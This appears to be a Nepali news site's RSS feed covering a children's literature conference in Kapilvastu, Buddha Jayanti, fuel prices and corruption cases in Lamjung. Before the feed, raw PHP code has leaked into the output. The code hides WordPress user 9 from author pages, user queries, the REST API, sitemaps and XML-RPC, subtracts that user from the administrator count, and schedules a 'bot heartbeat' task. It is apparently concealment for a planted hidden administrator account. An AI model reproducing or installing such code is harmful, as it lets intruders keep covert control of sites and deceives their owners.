add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
लुम्बिनी प्रदेश – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceWed, 22 Jul 2026 08:03:58 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgलुम्बिनी प्रदेश – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुमा : दुई दिने कार्यक्रमको तयारी सुरु
https://www.antaranganews.com/?p=50229
https://www.antaranganews.com/?p=50229#respondWed, 22 Jul 2026 01:36:35 +0000https://www.antaranganews.com/?p=50229तिलौराकोट (कपिलवस्तु)– नेपाल बालसाहित्य समाजको ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुको यहाँ दुई दिने कार्यक्रमका साथ हुने भएको छ । सम्मेलनको तयारी सुरु भएको आयोजक समितिले प्रेस वक्तव्य जारी गर्दै साउन ३ गते जानकारी दिएको हो ।
सो राष्ट्रिय सम्मेलन आगामी मंसिर ११ र १२ गते तिलौराकोटको पावन काखमा भव्य रूपमा सम्पन्न हुन गइरहेको व्यहोरा यहाँहरू सबैलाई जानकारी गराउँदछौँ । तिलौराकोटको ऐतिहासिक माटोको सुगन्ध, बुद्धकालीन शान्तिको दर्शन र आधुनिक बाल सिर्जनशीलताको अनुपम त्रिवेणी बन्ने उक्त गरिमामय कार्यक्रममा राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरका विज्ञहरू, स्रष्टाहरू र बालबालिकाहरूको उपस्थिति रहनेछ । प्राचीन कालमा सिद्धार्थ गौतमले बाल्यकाल बिताएको यसै भूमिबाट वर्तमानका बालबालिकाको सिर्जनात्मक र बौद्धिक क्षमतालाई उजागर गर्दै मौलिक एवं रैथाने बालसाहित्यको संरक्षण गर्ने ऐतिहासिक अवसरका रूपमा यस सम्मेलनलाई लिइएको छ । यस ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ लाई भव्य र ऐतिहासिक रूपमा सफल पार्नका लागि आवश्यक स्रोत सङ्कलन, व्यवस्थापन तथा पूर्वतयारीका कार्यहरू द्रुत गतिमा अघि बढिरहेको बताइएको छ ।
स्थानीय मूल आयोजक समिति, कपिलवस्तुका संयोजक मिनराज बेल्वासेले दस्तखत गर्नु भएको प्रेस वक्तव्यमा सम्मेलनका बारेमा जानकारी दिइएको हो । स्थानीय मूल आयोजक समिति, कपिलवस्तुको आयोजनामा हुन लागेको यस सम्मेलनले बाल साहित्यको विकाससँगै कपिलवस्तुको ऐतिहासिक, पुरातात्त्विक, सांस्कृतिक तथा पर्यटकीय महत्वलाई राष्ट्रिय तथा अन्तर्राष्ट्रिय स्तरमा उजागर गर्ने महत्वपूर्ण अवसर प्रदान गर्नेछ ।
जारी प्रेस वक्तव्यमा नेपाल बालसाहित्य समाजको ऐतिहासिक पृष्ठभूमि सहित वि.सं. २०४४ सालमा स्थापित भएको बताइएको छ । सो सम्मेलनमा आयोजक संस्थाले बालसाहित्यिक आफ्नो स्थापना कालदेखि नै बालबालिका तथा किशोर किशोरीहरूको लेखनकला र सिर्जनशीलताका साथसाथै पठन संस्कार र संस्कृतिको विकासका लागि विभिन्न सङ्घसंस्थाहरूसँग सहकार्य गर्दै नेपालका विभिन्न स्थानहरूमा राष्ट्रिय बालसाहित्य सम्मेलन आयोजना गर्दै आएको जनाएको छ ।
सा वक्तव्यमा शान्तिका अग्रदूत शाक्यमुनि बुद्धले आफ्नो जीवनका अमूल्य २९ वर्ष बिताउनुभएको, बाल्यकालीन क्रीडा गर्नुभएको, प्रारम्भिक शिक्षा आर्जन गर्नुभएको र मानव कल्याणका लागि महाभिनिष्क्रमण (ज्ञानको खोजीमा गृहत्याग) गर्नुभएको ऐतिहासिक, पुरातात्विक तथा पावन भूमि कपिलवस्तुको तिलौराकोट दरबार क्षेत्रमा नेपाल बालसाहित्य समाजले ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’ आयोजना गर्ने गौरवमय निर्णय गरेको उल्लेख छ । प्राचीन शाक्य गणराज्यको राजधानी तथा बुद्धकालीन ज्ञान र सभ्यताको केन्द्रका रूपमा रहेको यस ऐतिहासिक पर्यटकीय एवम् आध्यात्मिक स्थलमा देशभरका र एशीया क्षेत्रका बालसाहित्य अनुरागी, स्रष्टाहरू तथा बालबालिकाहरूलाई स्वागत गर्न पाउनु हाम्रा लागि अहोभाग्यको हो वक्तव्यमा भनिएको छ । सम्मेलनको उद्देश्य :
भगवान् गौतमबुद्धको बाल्यकाल तथा किशोरावस्थासँग जोडिएको ऐतिहासिक प्राचीन कपिलवस्तु (तिलौराकोट) को पवित्र भूमिमा आयोजना हुन लागेको यस सम्मेलनले साहित्य, इतिहास र पर्यटनलाई एउटै साझा मञ्चमा जोड्नेछ। गौतमबुद्धको क्रीडास्थलका रूपमा परिचित तिलौराकोट, बुद्धसँग सम्बन्धित महत्वपूर्ण स्थल कुदान, नेपाली साहित्यका विशिष्ट साधक साहित्यकार भवानी भिक्षुको जन्मभूमि तथा कपिलवस्तुका अन्य ऐतिहासिक, पुरातात्त्विक र सांस्कृतिक सम्पदाहरूलाई बाल साहित्यको सिर्जनात्मक संसारसँग जोड्दै यस क्षेत्रको महत्वलाई विश्वसामु प्रस्तुत गर्ने सम्मेलनको उद्देश्य रहेको उल्लेख छ ।
बाल साहित्यको माध्यमबाट बालबालिकामा सिर्जनशीलता, कल्पनाशक्ति, नैतिक चेतना, मानवीय मूल्य, सामाजिक उत्तरदायित्व तथा विश्वबन्धुत्वको भावना विकास गर्ने उद्देश्यका साथ आयोजना हुन लागेको यस सम्मेलनमा नेपालका विभिन्न क्षेत्र तथा एसियाली मुलुकहरूबाट बाल साहित्यकार, लेखक, शिक्षाविद्, अनुसन्धानकर्ता, शिक्षक, विद्यार्थी तथा साहित्यप्रेमीहरूको सहभागिता रहने अपेक्षा गरिएको छ । सम्मेलनको मूल उद्देश्य सात :
सम्मेलनको मूल उद्देश्यलाई सात बुँदामा उल्लेख गरिएको छ । स्थानीय बालबालिका, किशोरकिशोरी, शिक्षक, अभिभावक, साहित्यकार, कलाकारलगायत देश तथा विदेशबाट पाल्नुहुने दिग्गज सर्जकहरूको उपस्थितिमा सम्पन्न हुने ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’का मुख्य उद्देश्यहरू निम्नअनुसार रहेका छन् वक्तव्यमा भनिएको छ । ती हुन् ः
१) बालबालिका तथा किशोर किशोरीको लेखनकला, सिर्जनशीलता र सिप विकासमा टेवा पुरÞ्याउने ।
२) बालसाहित्यबारे शिक्षक, अभिभावक तथा विद्यार्थीहरूमा अभिरुचि र चेतना अभिवृद्धि गर्ने ।
३) बालबालिका तथा किशोरकिशोरीहरूमा साहित्यिक विभिन्न विधाहरूमध्ये कथा र कविता लेखन तथा वाचन, चित्रकला, अभिनय आदिको सिप विकास तथा क्षमता अभिवृद्धि गर्ने ।
४) पठन सीप र संस्कारको विकास गर्ने ।
५) पुस्तकालय व्यवस्थापन, पुस्तक प्रकाशनबारे बालबालिकालाई हौसला र उत्प्रेरणा दिने ।
६) नेपाली बालपुस्तकहरूबारे जानकारी दिने ।
७) स्थानीय सांस्कृतिक धरोहर, पुरातात्विक महत्त्व र मौलिक एवम् रैथाने बालसाहित्यको संरक्षण गर्ने ।
कपिलवस्तु र कपिलवस्तुवासीको प्रतिष्ठा र गौरवको विषय बनेको यो ऐतिहासिक सम्मेलनलाई सभ्य, भव्य र व्यवस्थित बनाउने उद्देश्यले मिति २०८२ चैत्र २१ गते भृकुटी सामुदायिक सिकाइ केन्द्रको बैठकले एक स्थानीय मूल आयोजक समिति गठन गरी आफ्ना कार्य सम्पादन गरिरहेको छ । सम्मेलनलाई सभ्य, भव्य र व्यवस्थित बनाउन पत्रकार सम्मेलन मार्फत जानकारी गराइन्छ । बाल साहित्यको वर्तमान अवस्था, सम्भावना र चुनौतीको खोजी :
बाल साहित्य बालबालिकाको मनोरञ्जनको माध्यम मात्र नभई उनीहरूको व्यक्तित्व विकास, संस्कार निर्माण, कल्पनाशीलता, सिर्जनात्मकता, वैज्ञानिक सोच र सामाजिक चेतना विकास गर्ने महत्वपूर्ण आधार हो । यसै मान्यतालाई आत्मसात् गर्दै सम्मेलनमा बाल साहित्यको वर्तमान अवस्था, सम्भावना र चुनौती, शिक्षासँगको सम्बन्ध, प्रविधिको प्रभाव तथा अन्तर्राष्ट्रिय सहकार्यका विविध विषयमा विमर्श, संवाद, सिर्जनात्मक प्रस्तुति तथा साहित्यिक गतिविधिहरू सञ्चालन हुने जानकारी वक्तव्यमाफर्त दिइएको छ । सम्मेलनमा हुने मुख्यमुख्य कार्यक्रमहरू :
मङ्सिर ११ र १२ गते हुने दुई दिने ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’ अन्तर्गत सम्पन्न गरिने मुख्यमुख्य कार्यक्रमहरू समेत वक्तव्यमै जानकारी दिइएको छ ।
उक्त सम्मेलनमा हुने कार्यशालामा १) बालकथा लेखन कार्यशाला, २) कविता लेखन कार्यशाला, ३) निबन्ध लेखन कार्यशाला, ४) समीक्षा लेखन कार्यशाला, ५) चित्रकला लेखन कार्यशाला, ६) हस्तलेखन कार्यशाला, ७) अभिनय प्रशिक्षण कार्यशाला, ८) नृत्य प्रशिक्षण कार्यशाला र ९) देवनागरी लिपिमा हस्तलेखन हुने भनिएको छ ।
साथमा विषयक्षेत्रमा बालबालिका केन्द्रित कार्यक्रमहरूको प्रस्तुति रहने समेत वक्तव्यमार्फत जानकारी दिइएको छ । ती हुन् ः क) कथा प्रस्तुति, ख) कविता प्रस्तुति, ग) निबन्ध प्रस्तुति, घ) चित्र प्रदर्शनी, ङ) नृत्य प्रस्तुति, च) अभिनय प्रस्तुति छ) हस्तलिपि प्रदर्शनी आदि छन् ।
यसैगरी, उक्त अवसरमा बीचबीचमा बालबालिका केन्द्रित कार्यक्रमहरूको प्रस्तुति रहने जानकारी दिदै तिनमा क) कथा प्रस्तुति, ख) कविता प्रस्तुति, ग) निबन्ध प्रस्तुति, घ) चित्र प्रदर्शनी, ङ) नृत्य प्रस्तुति, च) अभिनय प्रस्तुति, छ) हस्तलिपि प्रदर्शनी रहेको उल्लेख छ । कुल खर्च करिब १२ लाख रुपैयाँ लाग्ने आंकलन :
उक्त सम्मेलन सम्पन्न गर्नका लागि कुल खर्च करिब १२ लाख रुपैयाँ लाग्ने अनुमान गरिएको छ, जसमध्ये ७ लाख समाजको केन्द्र र ५ लाख स्थानीय आयोजकले व्यवस्थापन गर्नुपर्ने बताइएको छ । एसियाका विभिन्न ७ देशबाट १५ जना र ५० जना देशभरिका विशिष्ट साहित्यकार, कलाकारहरू र पाँच सय जना विद्यार्थीहरूले भाग लिने :
उक्त सम्मेलनमा एसियाका विभिन्न ७ देशबाट १५ जना र ५० जना देशभरिका विशिष्ट साहित्यकार, कलाकारहरू तथा कपिलवस्तु जिल्लाका करिब पाँच सय जना विद्यार्थीहरूले भाग लिने साहित्यिक इतिहासको कालखण्डमा विरलै हुने जिल्लाको यो ऐतिहासिक सम्मेलन केवल बालसाहित्य वा सिर्जना क्षेत्रका लागि मात्र नभई सिङ्गो कपिलवस्तु र कपिलवस्तुवासीको गौरवको कार्यक्रम भएकाले यसमा हामी सबैको इज्जत र प्रतिष्ठा जोडिएको समाजद्वारा जारी वक्तव्यमा उल्लेख छ ।
सो सम्मेलनमा देशका विभिन्न भाग तथा एसियाली मुलुकहरूबाट आउने सहभागीहरूले तिलौराकोट, कुदान, भवानी भिक्षुको जन्मभूमि लगायतका ऐतिहासिक तथा सांस्कृतिक स्थलहरूको अवलोकन गर्ने अवसर प्राप्त गर्ने भएकाले सम्मेलन कपिलवस्तुको पर्यटन प्रवर्धनका दृष्टिले पनि महत्वपूर्ण रहने बताइएको छ ।
यस सम्मेलनले कपिलवस्तुको ऐतिहासिक तथा पुरातात्त्विक महत्वलाई राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरमा थप परिचित गराउनुका साथै साहित्यिक, सांस्कृतिक तथा ऐतिहासिक पर्यटनको विकास र प्रवर्धनमा समेत महत्वपूर्ण योगदान पु¥याउनुका साथै यस पवित्र तिलौराकोटलाई विश्व सम्पदा सूचीमा सूचीकृतको लागि टेवा पुग्ने अपेक्षा गरिएको जारी वक्तव्यमा भनिएको छ ।
गौतमबुद्धको बाल्यकालसँग सम्बन्धित प्राचीन कपिलवस्तुको ऐतिहासिक विरासत,विश्व रामसार सूचीमा सूचीकृत जगदिशपुर सिमसार क्षेत्रको अद्वितीय प्राकृतिक सौन्दर्य, साहित्यकार भवानी भिक्षुको साहित्यिक योगदान तथा कुदानलगायतका महत्वपूर्ण सम्पदाहरूलाई बाल साहित्यको सिर्जनात्मक संसारसँग जोड्दै आयोजना हुन लागेको यो सम्मेलनले कपिलवस्तुको इतिहास, साहित्य, संस्कृति र पर्यटनलाई विश्वमञ्चमा प्रस्तुत गर्ने महत्वपूर्ण आधार निर्माण गर्ने विश्वास गरिएको छ । यस सम्मेलनको सफल आयोजनाका लागि स्थानीय मूल आयोजक समिति, कपिलवस्तुले नेपाल सरकार, प्रदेश सरकार, स्थानीय तह, पुरातत्व तथा पर्यटन क्षेत्रसँग सम्बन्धित निकाय, साहित्यिक तथा शैक्षिक संस्था, सञ्चारमाध्यम, साहित्यकार, शिक्षक, अभिभावक, विद्यार्थी तथा सम्पूर्ण साहित्यप्रेमी महानुभावहरूमा सक्रिय सहयोग, सहभागिता र सहकार्यका लागि हार्दिक आह्वान गर्दछ वक्तव्यमा उल्लेख छ । रमेशचन्द्र घिमिरेको सहयोगमा ।
]]>
https://www.antaranganews.com/?feed=rss2&p=502290आज २५७० औं बुद्धजयन्ती : विविध कार्यक्रमका साथ मनाइँदै
https://www.antaranganews.com/?p=48531
https://www.antaranganews.com/?p=48531#respondFri, 01 May 2026 01:36:59 +0000https://www.antaranganews.com/?p=48531बेसीशहर– २५७० औं बुद्धजयन्ती आज विश्वभर विविध कार्यक्रम गरी भव्यताका साथ मनाउने तयारी छ । सिद्धार्थ गौतम बुद्धको जन्म, बुद्धत्व प्राप्ति र महापरिनिर्वाण दिवस त्रिसंयोग परेको दिन वैशाख पूर्णिमालाई बुद्धजयन्ती मनाउने गरिन्छ । यो वर्ष वैशाख १८ गते यो पर्व परेको छ ।
संयुक्त राष्ट्र संघले समेत वैशाख पूर्णिमा बुद्ध जयन्तीका दिन शान्ति दिवसरुपमा मनाउन बिदा दिएर बुद्ध जयन्तीको गरिमा बढाइदिएको छ । यस पर्वलाई विश्वभरिका शान्तिप्रेमीले विशेष महत्व दिएर बुद्धको गुण स्मरण गर्ने पर्वको रुपमा परापूर्वकालदेखि मनाउँदै आएका छन् ।
यसै सन्दर्भमा धर्मोदय सभा लमजुङले आज यहाँ विशेष कार्यक्रमको आयोजना गरेको छ । घोषित कार्यक्रम अनुसार अहिले विहान चण्डिडाँडा स्थित गुम्बा र तामाङ गुम्बा क्याम्पस रोडमा पुजा चलिरहेको छ ।
विहान ११ बजे मनाङे चौताराबाट शान्ति र्यालीको आयोजना गरिएको आयोजक संस्थाका अध्यक्ष भरत गुरुङले जनाकारी दिनु भयो । उहाँका अनुसार बेसीशहर बजारको मुख्य सडक हुँदै सेरा चोकमा पुगेर भित्री बाटो हुँदै शान्ति टोल स्थित तमू आमा तथा बाबा भवनमा प्रवचन लगायतको मञ्चको कार्यक्रम हुनेछ ।
सो अवसरमा त्रिपिटकको प्रदर्शन, साँझ बुद्ध दर्शनमा आधारित चलचित्रको प्रदर्शन, लामाहरूको प्रवचन आदि गरिने छ । सो कार्यक्रमका लागि बेसीशहरमा रहेका सधै धार्मिक एवम् जातीय संघसंस्था, जिल्लाका राजनीतिक दलहरूलाई निमन्त्रणा गरिएको उहाँको भनाइ छ ।
विश्वको सबैतिर अरबौंको संख्यामा रहेका बौद्धमार्गीहरुले व्यापक रुपमा यो पूर्णिमाका दिन बुद्ध जयन्ती अतन्तै श्रद्धाभावले मान्दछन् र गौतम बुद्ध र उहाँका ज्ञानको चर्चा परिचर्चा गर्छन् । विश्व शान्तिको कामना गर्दै विभिन्न कार्यक्रम चलाएर शान्तिका अग्रदुत गौतम बुद्धलाई सम्झेर श्रद्धापूर्वक नमन गर्दछन् ।
बुद्ध जयन्तीलाई बैशाख पूर्णिमा पनि भनिन्छ । यस दिन बौद्ध धर्मवलम्बीहरूले मान्दै आइरहेको बुद्ध जयन्तीको ठूलो महत्व छ । बैशाख पूर्णिमाकै दिन गौतम बुद्धको जन्म वोधिज्ञान र महापरिनिर्वाण प्राप्त गर्नु भएको महत्वपूर्ण तीनवटा संयोग परेकोले पनि बैशाख पूर्णिमाको अत्यन्तै महत्व भएको हो ।
विभिन्न कार्यक्रम गरेर भव्यरुपमा बुद्ध जयन्ती मनाइन्छ । यसमा देशी तथा विदेशी बौद्धमार्गीहरू सम्मिलित भई श्रद्धापूर्वक बुद्धजयन्ती मनाइन्छ ।
नेपालमा देशभरि रहेका चैत्य स्तुप, गुम्बा र विहारहरुमा बुद्धको पुजा गरिन्छ । साथै व्यापक रुपमा विभिन्न कार्यक्रमहरू गरेर विश्व शान्तिको कामना पनि गरिन्छ । भगवान बुद्धका मूर्ति भएका ठाउँमा मेला पनि लाग्छ । गौतम बुद्धका जन्म भएको स्थान नेपालको लुम्बिनीमा ठूलो मेला लाग्छ ।
बौद्ध झण्डामा भएका पाँचथरी रङ्ग पञ्चतत्व आकाश जल, पृथ्वी अग्नि र हावालाई लिईएको छ । त्यस्तै निलो सेतो, पहेंलो गेरु र रातो रङ्ग भएको बौद्ध झण्डा पञ्चबुद्धको प्रतिकको रुपमा बौद्धधर्ममा मानिन्छ । विश्व ब्रहाण्ड चराचर जीवजगतमा यिनै पाँच तत्व नै व्याप्त भइरहेको छ । संसारमा जति पनि प्राणीहरु छन् ती सबै पञ्चतत्ववाटै श्रृष्टि भएर त्यसैमा विलिन भई जाने गर्दछ ।
त्यसैले प्राणी मात्रको जीवनचक्रमा जन्म र मृत्यु भइरहने हो । भगवान गौतम बुद्धले मानिसहरुको दुःख हुनु, जन्ममृत्युको चक्रमा परिरहनु र त्यसको उद्धारका लागि सबैले बुझ्ने गरी विभिन्न किसिमको ज्ञान दिनु भएको छ । यो संसारमा मानिसहरु भौतिक सुख सुविधाले सम्पन्न हुनु र गरिब हुनाले माग सुख र दुःख हुने होइन । वास्तवमा मानिसहरुमा भएका दुषित चित्रले गर्दा नै दुःख हुने हो । काम, क्रोध, लोभ, मोह र अहंकार जस्ता विकारले नै मानिसहरुलाई दुःख भइरहने हो ।
पञ्चशिल र अष्टाङ्गशील जस्ता अत्यन्तै महत्वपूर्ण लोककल्याणका लागि ज्ञान दिनु भएको छ । भगवान गौतम बुद्धले दिनु भएको मार्गमा आगाडी बढ्दै विश्वशान्तिको कामना गर्नु नै गौतम बुद्धले दिनु भएको सार्थक हुने छ ।
यहि चित्तको विकारले गर्दा नै मानिसहरू जन्म भइरहनु पर्ने अनि मरिरहनु पर्ने हो । यसरी जन्म र मृत्युको दुःखको चक्रमा मानिसहरू अल्झिरहन्छन् । मानिसहरू जन्मिनु पनि दुःख, विरामी हुनु पनि दुःख, वृद्ध हुनु दुःख, आफ्ना प्रियजनहरूसँग छुट्टिएर बस्नु पर्ने पनि दुःख, मन नपर्नेहरूसँग बस्नु पर्ने पनि दुःख अनि अन्तिममा मर्नु पर्ने पनि दुःख । यिनै सम्पूर्ण दुःखको वास्तविकताबाट पार पाउन नै सजिलो मार्ग अष्टाङ् मार्ग हो भने भगवान गौतम बुद्धले बाटो देखाउनु भएको छ ।
त्यस्तै, देशभरका विभिन्न गुम्बा, चैत्य, विहार, स्तुपालगाययतका ठाउँमा बुद्धको पूजा तथा दीप प्रज्वलन, प्रवचनजस्ता कार्यक्रम हुने गर्छन् ।
बुद्धको जन्म इशापूर्व ५६३ मा नेपालको लुम्बिनीमा भएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=485310बढ्यो खाना पकाउने एलपी ग्यासको मूल्य : विद्युतीय चुल्होप्रतिको आकर्षण बढ्दै
https://www.antaranganews.com/?p=48526
https://www.antaranganews.com/?p=48526#respondFri, 01 May 2026 00:44:47 +0000https://www.antaranganews.com/?p=48526काठमाडौं– नेपाल आयल निगमले खाना पकाउने एलपी ग्यासको मूल्य बढाएको छ । निगमले आज राति १२ बजेबाट खाना पकाउने ग्यासको मूल्य २ हजार १ सय ६० रुपैयाँ कायम गरेको प्रेस विज्ञप्ति जारी गर्दै निगमले वैशाख १७ गते जनाएको हो ।
निगमले पेट्रोल, मट्टितेल र डिजेलको मूल्य भने घटेको विज्ञप्तिमा उल्लेख गरेको छ ।
समायोजनपछि अब खाना पकाउने एलपी ग्यासको मूल्य १४.२ केजीलाई २१६० रुपैयाँ पर्ने निगमले जनाएको छ । निगमका अनुसार अब ७.१ केजी (आधा सिलिन्डर) को १०८० पर्नेछ ।
यसअघि पूरा सिलिण्डर ग्यासको मूल्य २ हजार १० कायम थियो भने आधा सिलिण्डरको १ हजार ५ रुपैयाँ कायम थियो ।
एलपी ग्यासको मूल्य बढेसँगै विद्युतीय चुल्होप्रति उपभोक्ताको आकर्षण बढ्ने भएको आंकलन गरिएको छ । मुलुकमा उत्पादिन विद्युतको खपतका लागि पनि विद्युतीय चुल्होको प्रयोग जरुरी देखिन्छ ।
यसैबीच, निगमले पेट्रोल र डिजेलको मूल्य भने घटाएको छ । निगमले पेट्रोलमा प्रतिलिटर २ रुपैयाँ, डिजेल र मट्टितेलमा प्रतिलिटर १२ रुपैयाँ घटाइएको जनाएको छ ।
यसैगरी, हवाई इन्धन आन्तरिकतर्फ प्रतिलिटर ७ रुपैयाँ र हवाई इन्धन अन्तर्राष्ट्रियतर्फ अमेरिकी डलर ४६ ले बढाइएको विज्ञप्तिमा उल्लेख छ ।
समायोजनपछि पेट्रोलको मूल्य प्रतिलिटर क्रमशः पहिलो वर्गमा २१४.५०, दोस्रो वर्गमा २१६ र तेस्रो वर्गमा २१७ रुपैयाँ कायम गरिएको छ । डिजेल र मट्टितेलको मूल्य प्रतिलिटर पहिलो वर्गमा २२२.५० दोस्रो वर्गमा २२४ र तेस्रो वर्गमा २२५ पुगेको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=485260लमजुङका सिडिओहरू लगायतका कार्यालय प्रमुखहरू किन पर्छन् भ्रष्टाचार मुद्दामा ?
https://www.antaranganews.com/?p=38635
https://www.antaranganews.com/?p=38635#respondFri, 27 Feb 2026 02:13:07 +0000https://www.antaranganews.com/?p=38635बेसीशहर– लमजुङमा पछिल्लो चरणमा आएका प्रमुख जिल्ला अधिकारी(सिडिओ)हरू शृंखलाबद्ध रुपमा नै भ्रष्टाचारमा तानिई रहेका छन् । यतिबेला लमजुङमा आएका प्रजिअ लगायतका कार्यालय प्रमुखहरू नै किन पर्छन् भ्रष्टाचार मुद्दामा ? भन्ने जिज्ञासा बढ्न थालेको छ ।
लमजुङका प्रमुख जिल्ला अधिकारी(प्रजिअ) उमेश ढुंगानालगायत ३२ जनाका विरुद्ध विशेष अदालतले फागुन १३ गते भ्रष्टाचार मुद्दा दर्ता भएसँगै उनी सोही दिन साँझ लमजुङबाट विदा भएका हुन् । विद्यमान नियम अनुसार सरकारी कर्मचारी विरुद्ध भ्रष्टाचार मुद्दा दर्ता भएपछि स्वतः निलम्बनमा पर्ने व्यवस्था छ ।
अख्तियार दुरुपयोग अनुसन्धान आयोगले बिशेष अदालतमा भ्रष्टाचार मुद्दा दायर गरेको हो । ढुंगाना गत वर्ष लुम्बिनी प्रदेशको उद्योग, पर्यटन तथा यातायात मन्त्रालयको सचिवको रुपमा कार्यरत रहँदा भारतबाट चोरी गरी ल्याइएका गाडीको दर्ता प्रकरणमा अख्तियारले दोषी करार गरी मुद्दा दायर गरेको छ । सो मुद्दामा ढुंगानासहित ३२ जनाविरुद्ध मुद्दा दायर भएको अख्तियार स्रोतले जनाएको छ ।
लुम्बिनी प्रदेशको उद्योग, पर्यटन तथा यातायात मन्त्रालयको समेत मिलेमतोमा भन्सार छली गरेर ल्याइएको गाडीहरूको दर्ता गरेर सक्कली ब्लुबुक नै दिएको खुल्न आएको थियो । त्यस्तो दर्ता गर्दा सवारी साधन हेरी आठ हजारदेखि ३२ हजार रुपैयाँसम्म प्रतिगोटाका दरले खुस आएको भन्ने खुल्न आएको छ ।
सो रहस्य पछि यातायात कार्यालयले अधिकृत प्रेमप्रसाद उपाध्यायको संयोजकत्वमा छानबिन समिति गठन गरेको थियो । सो समितिको तयार गरेको अनुसन्धान प्रतिवेदन प्रतिवेदनलाई स्वीकृत गरेको आधारमा सहसचिव ढुंगाना भ्रष्टाचार मुद्दामा तानिएको बताइन्छ ।
अख्तियारले जारी गरेको विज्ञप्तिमा मुद्दा दायर गरिएका ३२ जनामध्ये ढुंगानाको नाम १ नंमा रहेको छ । उनका विरुद्धमा भ्रष्टाचार निवारण ऐन २०५९ को दफा १९ को उपदफा २ बमोजिक कसुर गरेको हुँदा सोही अनुसार कैद र जरिवाना हुन माग दावी गरिएको उल्लेख छ ।
ढुंगाना गत पुसमा मात्र प्रमुख जिल्ला अधिकारीको रुपमा लमजुङमा खटाइएका थियो ।
त्यसो त यस प्रकार भ्रष्टाचार मुद्दामा तानिले लमजुङका प्रमुख जिल्ला अधिकारी ढुंगाना पहिलो व्यक्ति होइनन् । यसअघिका तीनजना प्रमुख जिल्ला अधिकारी पनि भ्रष्टाचार मुद्दामा तानिएका थिए । त्यस्तै एक जना मालपोत अधिकृत पनि त्यसरी नै हालै तानिएका छन् ।
यसरी लमजुङमा कार्यालय प्रमुख भएर आउने व्यक्तिहरू नै किन भ्रष्टाचारका मुद्दामा तालिन्छन् ? भन्ने प्रश्नले धेरैलाई अचम्भित बनाउँदै धेरैको मानस पटलमा कौतुहलता सिर्जना गर्ने गरेको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=386350असल शासन पोष्टले विविध कार्यक्रमका साथ मनायो रजत उत्सव
https://www.antaranganews.com/?p=38554
https://www.antaranganews.com/?p=38554#respondFri, 20 Feb 2026 13:46:04 +0000https://www.antaranganews.com/?p=38554नेपालगञ्ज– असल शासन पोष्ट साप्ताहिकले आफ्नो रजत उत्सव भव्यताका साथ मनाएको छ । विविध कार्यक्रम सञ्चालन गरी रजत उत्सव भव्य रुपमा फागुन ७ गते मनाइएको हो ।
